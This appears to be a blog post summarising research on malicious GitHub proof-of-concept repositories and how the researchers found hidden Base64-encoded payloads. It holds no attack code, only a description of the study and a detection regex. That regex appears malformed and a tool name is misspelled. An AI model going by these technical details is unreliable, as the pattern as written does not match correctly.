In Beyond the Surface, a timely GitHub malicious repository research paper, it was revealed that repositories are intentionally malicious and publicly uploaded by the repository owner. The researcher studied 47,313 repositories containing malicious files and downloaded GitHub repositories; 4893 were malicious. In some, the attackers were trying to plant malware on users’ machines, while in others, they tried to open backdoors using CobalStrick. This research is particularly relevant in the current cybersecurity landscape.
The researchers have meticulously collected a detailed dataset to
analyze all PoCs on GitHub made for specific CVEs by using the GitHub API,
which provides keyword-based search capabilities for repositories, code, and
commits. They also painstakingly examined the contents, source code, and
associated documentation of such repositories to verify whether they contained
PoCs for CVE exploits.
In the 21st century, there are many tactics for exploiting vulnerabilities in web applications, OS systems, Network security,
etc. Whether a small website or a bigger online platform, all data are
connected through programming languages. Cyber attackers exploit up-to-date
vulnerabilities to inject malware or attack scripts and shell code. GitHub is
not exceptional. They use many repository code templates for programming, website
development, etc. The motive of this blog is to write how the researcher
analyzes their collected dataset using Base64 analysis.
A table of programming languages used in the repositories shows that
Python has emerged as the dominant programming language among hackers and has
exploited developers over the past five years.
Base64 analysis: Base64 encoding is another prevalent method for
detecting malicious payloads; the researcher extracted base64 values using
regular expressions, analyzed them, and decoded hidden scripts to detect any
connections with IPs within the encoded payloads. During the analysis, they initially
conducted an automated search for base64 payloads using the following regular
expression in the PoCs:
([A-Za-z0-9+/]{4}*([A-Za-z0-9+/]{4}
|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==))
No comments:
Post a Comment